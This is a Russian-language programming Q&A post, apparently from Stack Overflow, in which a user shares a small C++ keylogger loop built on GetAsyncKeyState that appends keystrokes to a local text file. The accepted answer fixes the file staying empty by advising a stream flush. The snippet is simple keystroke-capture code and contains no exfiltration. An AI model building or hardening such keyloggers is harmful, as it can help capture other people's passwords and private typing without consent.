# fstream c++ keylogger

Tags: c++, visual-studio, fstream

Есть зацикленная функция, которая записывает нажатия клавиши в txt файл.

```
ofstream fout("C:/Users/olegs/Desktop/tester.txt", ios_base::app);
void keyLog()
{
    for (int i = 0; i < 255; i++)
    {
        int state = GetAsyncKeyState(i);
        if (state == 1 || state == -32767)
        {
            fout << char(i);
        }
    }
}
```

Но записывает клавиши в файл только в случае закрытии программы через крестик консоли. Если закрыть программу через диспетчер задач или другим способом файл останется пустым. Как сделать что бы записывалось в любом случае?

Answer (score 2, accepted):

Это потому что вывод кэшируется, и кэш сбрасывается на диск только по необходимости или при закрытии файла. Используйте функцию `flush` потока чтобы сбросить кэш принудительно.

Comment: благодарю, работает, после каждого нажатия скидываю кеш